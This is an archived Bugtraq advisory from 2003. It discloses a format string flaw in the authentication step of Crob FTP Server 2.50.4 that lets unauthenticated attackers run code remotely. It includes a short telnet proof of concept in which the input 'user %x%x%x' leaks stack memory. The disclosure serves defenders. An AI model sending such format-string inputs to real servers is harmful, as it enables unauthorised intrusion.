Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Format String Vulnerability in Crob Ftp Server

From: Luca Ercoli <luca.ercoli () inwind it>
Date: 2 Jun 2003 16:55:10 -0000


Package:        Crob Ftp Server
Auth:           Crob Software Studio (www.crob.net/studio/ftpserver/)
Version:        2.50.4 Build 228
Vulnerability:  Format String
Risk:           High


Vulnerability
Description:

A format string flaw in the authentication process allows remote attackers 
without valid user/pass to execute arbitrary code.


C:\>telnet 192.168.0.1 21

220- Crob FTP Server V2.50.4
220  Welcome to Crob FTP Server

user %x%x%x

331 Password required for 0d1250b70







Luca Ercoli luca.ercoli[at]inwind.it
Previous By Date Next
Previous By Thread Next

Current thread: